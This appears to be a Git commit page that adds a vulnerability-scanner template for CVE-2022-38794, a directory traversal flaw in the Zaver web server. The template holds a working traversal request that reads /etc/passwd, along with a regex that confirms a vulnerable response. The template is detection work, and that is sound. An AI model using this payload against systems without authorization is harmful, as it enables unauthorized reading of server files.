Merge pull request #5237 from pikpikcu/patch-338

Added CVE-2022-38794
patch-1
Prince Chaddha 2022-09-12 17:59:38 +05:30 committed by GitHub
commit e9ff6c61a2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: CVE-2022-38794
info:
name: Zaver - Local File Inclusion
author: pikpikcu
severity: high
description: |
Zaver through 2020-12-15 allows directory traversal via the GET /.. substring.
reference:
- https://github.com/zyearn/zaver/issues/22
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38794
- https://nvd.nist.gov/vuln/detail/CVE-2022-38794
tags: cve,cve2022,lfi,zaver
requests:
- method: GET
path:
- '{{BaseURL}}/../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200